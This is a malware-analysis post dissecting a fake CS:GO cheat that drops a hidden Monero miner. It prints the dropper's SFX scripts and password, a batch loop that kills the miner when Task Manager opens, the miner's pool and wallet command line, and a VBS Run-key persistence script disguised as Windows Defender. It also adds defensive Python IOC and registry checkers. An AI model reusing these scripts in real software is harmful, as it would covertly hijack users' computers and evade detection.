Fake CS:GO Cheat Tool

As we all know, CS:GO is a popular online game, and plenty of cheat tools for it are offered online. Some of them are genuine (and will get you a VAC ban soon enough), but some of them are malware.

Here is a sample.


After loading it into Exeinfo PE, we can see that the file is a RAR SFX archive, so we simply extract it with WinRAR and get a file named "file.exe". Judging by its icon, this file is also a RAR SFX archive, but when we try to extract it, we are asked for a password.

A RAR SFX archive may carry a self-extraction script in its archive comment, so let's open the outer file in WinRAR and check whether it contains one.

Here is the script:

Setup=file.exe -pB7%s?LNmnAndbRN{
TempMode
Silent=1
Overwrite=1
Update=U

In RAR's command syntax the password is glued directly onto the -p switch ("-pSecret", not "-p Secret"), so the Setup line tells us the password is "B7%s?LNmnAndbRN{". With it we can extract the password-protected archive.

After extraction, we find that the files inside carry the hidden attribute (so Explorer does not show them by default), and we have to clear it before working with them.

Once the hidden attributes are removed, we find lots of scripts and executables. Which one should we analyze first? The best starting point is the self-extraction script of "file.exe". Here it is:

Path=C:\Windows\Temp\Windows
Setup=sec.vbs
Setup=procces.vbs
Setup=autorun.vbs
Silent=1
Overwrite=1
Update=U

This script extracts the files to a folder inside the Windows directory (C:\Windows\Temp\Windows) and then runs three VBS scripts in order, so analyzing those three scripts first is the sensible approach.
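Reading the SFX comment by hand works for one sample, but the same two things have to be pulled out of every RAR SFX dropper: the ordered list of Setup commands and any password hidden in a -p switch. The following Python is an added example (not code from the original post) that parses both comment scripts shown above; the two comment strings are constructed copies of the scripts on this page, and the parser handles the quoted form -p"with spaces" as well as the bare -p (prompt) and -p- (no password) cases of WinRAR.

```python
import re

# Constructed copies of the two SFX comment scripts shown on this page
# (the outer dropper's and file.exe's), used as sample input.
OUTER_SFX_COMMENT = """Setup=file.exe -pB7%s?LNmnAndbRN{
TempMode
Silent=1
Overwrite=1
Update=U
"""

INNER_SFX_COMMENT = """Path=C:\\Windows\\Temp\\Windows
Setup=sec.vbs
Setup=procces.vbs
Setup=autorun.vbs
Silent=1
Overwrite=1
Update=U
"""

# WinRAR glues the password to the switch ("-pSecret", never "-p Secret");
# a quoted form -p"with spaces" is also accepted. The password may contain
# characters such as % ? { that a shell-style tokenizer would mangle, so a
# regex is used instead of shlex.
_PASSWORD_SWITCH = re.compile(r'(?:^|\s)-p(?:"([^"]*)"|(\S*))')


def parse_sfx_comment(text):
    """Split a WinRAR SFX comment into Setup commands (in order), bare
    keyword flags such as TempMode, and the remaining Key=Value options."""
    parsed = {"setup": [], "flags": [], "options": {}}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):   # blank or comment line
            continue
        if "=" not in line:
            parsed["flags"].append(line)
            continue
        key, _, value = line.partition("=")
        key, value = key.strip(), value.strip()
        if key.lower() == "setup":
            parsed["setup"].append(value)        # Setup= may repeat
        else:
            parsed["options"][key] = value
    return parsed


def rar_password_from_command(command):
    """Return the password a Setup command passes via -p, or None.
    A bare -p means 'prompt' and -p- means 'no password'; both yield None."""
    match = _PASSWORD_SWITCH.search(command)
    if not match:
        return None
    password = match.group(1) if match.group(1) is not None else match.group(2)
    return password if password and password != "-" else None


def sfx_chain(text):
    """List each Setup command with the password it carries (if any)."""
    return [(cmd, rar_password_from_command(cmd))
            for cmd in parse_sfx_comment(text)["setup"]]


if __name__ == "__main__":
    for comment in (OUTER_SFX_COMMENT, INNER_SFX_COMMENT):
        for cmd, pwd in sfx_chain(comment):
            print(f"{cmd!r:45} password={pwd!r}")
```

Feed it the comment text as WinRAR shows it under the archive comment; for nested droppers, run it again on the comment of each extracted SFX until no Setup line launches another archive.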

  • sec.vbs

This script is also dropped by "Defender.exe". Its only purpose is to limit the number of running instances of "WindowsDefender.exe", which it does by registering a WMI event query through ExecNotificationQuery.

  • procces.vbs

It just runs "procces.bat".

  • procces.bat

@echo off
:begin
rem If neither Task Manager nor Performance Monitor is running, jump to ELSE
(tasklist |>nul Find /i "Taskmgr.exe" || tasklist |>nul Find /i "perfmon.exe") || (goto Else)
:THEN
rem A monitoring tool is open: kill the miner so its CPU load is not seen
TASKKILL /IM "WindowsDefender.exe" /F
Goto end
:ELSE
rem No monitoring tool: (re)start the miner via run.vbs if it is not running
tasklist |>nul findstr /b /l /i /c:WindowsDefender.exe || start run.vbs
timeout /t 2 /nobreak >nul
:END
goto:begin

From the script we can see that the miner is killed whenever "taskmgr.exe" or "perfmon.exe" appears in the process list, so the user never sees its CPU load in Task Manager or Performance Monitor. If neither is found and "WindowsDefender.exe" is not already running, run.vbs is started; the loop then sleeps two seconds and checks again.

  • run.vbs

It queries the IP address of the current computer and then runs "run.bat" with that address as a parameter.

  • run.bat

WindowsDefender.exe -o pool.minemonero.pro:5555 -u 4BJkthMnz2dXf4kohVYgf2W8SV1UL9J7Xbemj5w13hVecHi4cfXJvD9EEvWHWUtAJYWAmXbG3GkyVbrN8gfrQiBY3jbtC4r -p %1:nyhsjaqm@yomail.info -k --max-cpu-usage=50

Oh… so the malware is a coin miner! The switch set is the one used by XMRig and its forks: -o is the pool, -u the Monero wallet (a 95-character address starting with 4), -p the pool password (here the victim's IP address from run.vbs followed by an e-mail address), -k keeps the connection alive, and --max-cpu-usage=50 caps CPU use at 50% so the mining is less likely to be noticed.
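The useful indicators in this sample (pool, port, wallet, the worker string and the CPU cap) all sit in that one command line, and the same fields appear in every XMRig-style miner. The following Python is an added example, not code from the original post: it parses the command line shown above (embedded as a constructed copy, with %1 left as the batch placeholder) into a dictionary of IOCs, accepts both the --opt=value and --opt value forms, and checks that the -u value has the shape of a standard Monero address.

```python
import re

# Constructed copy of the run.bat command line shown on this page. The %1 is
# the batch parameter that run.vbs fills with the victim's IP address.
MINER_CMDLINE = (
    "WindowsDefender.exe -o pool.minemonero.pro:5555 "
    "-u 4BJkthMnz2dXf4kohVYgf2W8SV1UL9J7Xbemj5w13hVecHi4cfXJvD9EEvWHWUtAJYWAmXbG3GkyVbrN8gfrQiBY3jbtC4r "
    "-p %1:nyhsjaqm@yomail.info -k --max-cpu-usage=50"
)

# A standard Monero address is 95 base58 characters starting with '4'
# (base58 omits 0, O, I and l).
_MONERO_STD_ADDR = re.compile(r"^4[1-9A-HJ-NP-Za-km-z]{94}$")


def is_monero_address(value):
    return bool(_MONERO_STD_ADDR.match(value))


def _split_pool(url):
    """'stratum+tcp://host:port' or 'host:port' -> (host, port or None)."""
    url = url.rsplit("://", 1)[-1]            # drop a scheme if present
    host, sep, port = url.rpartition(":")
    if not sep:
        return url, None
    return host, (int(port) if port.isdigit() else None)


def parse_miner_cmdline(cmdline):
    """Extract IOCs from an XMRig-style miner command line.
    Handles '--opt=value' as well as '--opt value' forms."""
    tokens = cmdline.split()
    iocs = {"binary": tokens[0], "pool": None, "port": None, "wallet": None,
            "worker": None, "pass_extra": None, "keepalive": False, "cpu_cap": None}
    i = 1
    while i < len(tokens):
        tok = tokens[i]
        i += 1
        took_next = False
        if tok.startswith("--") and "=" in tok:
            opt, value = tok.split("=", 1)
        else:
            opt, value = tok, None
            if i < len(tokens) and not tokens[i].startswith("-"):
                value, took_next = tokens[i], True
        if opt in ("-o", "--url") and value is not None:
            iocs["pool"], iocs["port"] = _split_pool(value)
        elif opt in ("-u", "--user") and value is not None:
            iocs["wallet"] = value
        elif opt in ("-p", "--pass") and value is not None:
            # This sample packs "<worker>:<e-mail>" into the pool password.
            worker, _, extra = value.partition(":")
            iocs["worker"], iocs["pass_extra"] = worker, (extra or None)
        elif opt in ("-k", "--keepalive"):
            iocs["keepalive"] = True
            took_next = False                 # flag takes no argument
        elif opt == "--max-cpu-usage" and value is not None:
            iocs["cpu_cap"] = int(value) if value.isdigit() else None
        else:
            took_next = False                 # unknown switch: do not swallow next token
        if took_next:
            i += 1
    return iocs


if __name__ == "__main__":
    found = parse_miner_cmdline(MINER_CMDLINE)
    for key, value in found.items():
        print(f"{key:10} {value}")
    print("wallet looks like a Monero address:", is_monero_address(found["wallet"]))
```

The pool host and wallet are the indicators worth sharing; the e-mail part of -p is only meaningful to the pool's notification feature, and the IP in %1 is per victim, so neither belongs in a detection rule.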

  • autorun.vbs

Dim root, KeyHP, WshShell
' HKCU Run key: entries here are launched at every logon of this user
root = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\"
' Value name chosen to look like the real Windows Defender
KeyHP = "WindowsDefender"
Set WshShell = WScript.CreateObject("WScript.Shell")
' Writes WindowsDefender = C:\Windows\Temp\Windows\Defender.exe under Run
WshShell.RegWrite root & KeyHP, "C:\Windows\Temp\Windows\Defender.exe"

This simply makes the malware start again at every logon of the infected user (the HKCU Run key fires at user logon, not at system boot), under a value name that imitates Windows Defender.
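Two properties of this Run value give it away: the executable lives under C:\Windows\Temp, and the value name borrows a security product's name while the path is not a vendor location. The Python below is an added example (not code from the original post) that scores HKCU Run values on exactly those two points. The sample list is constructed: it contains the value autorun.vbs writes, plus a benign-looking OneDrive entry for contrast. The live reader uses the standard winreg module and only works on Windows; the scoring itself is pure and runs anywhere.

```python
import re

try:
    import winreg                      # Windows only; scoring below needs no registry
except ImportError:
    winreg = None

# Constructed sample of HKCU\...\Run values: the entry this page's autorun.vbs
# writes, plus a benign-looking entry for contrast.
SAMPLE_RUN_VALUES = [
    ("WindowsDefender", r"C:\Windows\Temp\Windows\Defender.exe"),
    ("OneDrive", r'"C:\Program Files\Microsoft OneDrive\OneDrive.exe" /background'),
]

# Locations a legitimate autostart binary rarely lives in.
TEMP_DIR_RE = re.compile(r"(\\windows\\temp\\|\\appdata\\local\\temp\\|%temp%|%tmp%)", re.I)
# Names that borrow a security product's identity.
SECURITY_NAME_RE = re.compile(r"(defender|antivirus|security|msmpeng|smartscreen)", re.I)
# Prefixes where genuine vendor binaries are installed.
VENDOR_PREFIXES = ("c:\\program files", "c:\\windows\\system32")


def first_token(command):
    """Executable path from a Run value: respects a leading quoted path."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end] if end > 0 else command[1:]
    return command.split(" ", 1)[0]


def assess_run_value(name, command):
    """Return the reasons a Run value looks like a persistence implant ([] if none)."""
    reasons = []
    exe = first_token(command)
    if TEMP_DIR_RE.search(exe):
        reasons.append("executable lives in a temp directory")
    if SECURITY_NAME_RE.search(name) and not exe.lower().startswith(VENDOR_PREFIXES):
        reasons.append("name imitates a security product but path is not a vendor location")
    return reasons


def suspicious_run_values(values):
    """Map value name -> reasons, keeping only flagged entries."""
    flagged = {}
    for name, command in values:
        reasons = assess_run_value(name, command)
        if reasons:
            flagged[name] = reasons
    return flagged


def read_hkcu_run():
    """Live read of the current user's Run key on Windows; [] elsewhere."""
    if winreg is None:
        return []
    entries = []
    key = winreg.OpenKey(winreg.HKEY_CURRENT_USER,
                         r"Software\Microsoft\Windows\CurrentVersion\Run")
    try:
        index = 0
        while True:
            try:
                name, data, _ = winreg.EnumValue(key, index)
            except OSError:            # raised when no more values remain
                break
            entries.append((name, data))
            index += 1
    finally:
        winreg.CloseKey(key)
    return entries


if __name__ == "__main__":
    values = read_hkcu_run() or SAMPLE_RUN_VALUES
    for name, reasons in suspicious_run_values(values).items():
        print(name, "->", "; ".join(reasons))
```

On a real host, run the same check against the HKLM Run and RunOnce keys too; this sample only needed HKCU because it never asked for elevation.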

Related MD5:

42C22D383A9D2CE5EA186B2A2FF846E6

5F70F5711803188AE9E4401C7E2142F5

X-Sec Antivirus Detection:

Cloud Engine: Cloud:Trojan.Win32.CoinMiner